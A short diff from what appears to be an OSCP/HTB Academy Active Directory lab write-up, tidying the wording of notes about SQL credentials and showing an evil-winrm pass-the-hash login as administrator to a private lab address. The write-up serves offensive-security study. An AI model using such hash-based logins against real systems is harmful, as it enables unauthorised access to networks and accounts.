krovs/oscp-writeups/docs/HTB Academy/ad2.md

 </configuration>
 ```

-Credentials for the sql instance in .60
+Credentials for the SQL instance in `.60`.

-Connect with administrator hash found in .60
+Connect with the administrator hash found in `.60`:

 ```shell
 $evil-winrm -i 172.16.7.50 -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99